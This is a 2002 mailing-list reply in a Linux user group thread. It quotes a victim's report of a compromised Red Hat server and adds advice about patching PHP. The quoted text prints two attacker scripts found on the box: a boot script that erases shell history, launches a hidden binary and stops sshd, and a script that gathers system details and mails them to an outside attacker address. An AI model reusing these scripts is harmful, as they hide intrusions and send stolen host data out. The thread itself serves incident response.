[lug] i got hacked
D. Stimits
stimits at idcomm.com
Thu Apr 18 16:02:54 MDT 2002
j davis wrote:
>
> i have a box at a place i do contract work about 2 days a month.
> today i could not ssh to it. so iwent on site and discoverd i got
> hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
> they exploited wu-ftpd
> ..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
> yet.
> anyway here is what i found in /etc/rc3.d/S52remote
>
> #!/bin/sh
>
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
>
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
>
> /usr/bin/trimite
>
> then here is /usr/bin/trimite
>
> #!/bin/sh
>
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info
> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> rm -f /tmp/info
>
> so, netstat says i have something listening on 25897...what should i do?!
> never benn hacked before....i already turned off ftp and turned on tcp
> wrappers.
>
> help please
> jd
>
One possible addition, I can't read the web pages I found due to
languages I don't read, but I have seen PHP noted in a few spots.
Perhaps this exploit is related to recent PHP web server
vulnerabilities. If you have Apache running, it is usually fine as is,
but PHP without recent updates is a guaranteed vulnerability on top of
what was already mentioned. Check your web packages and extensions also
for vulnerabilities and updates.
D. Stimits, stimits at idcomm.com
More information about the LUG
mailing list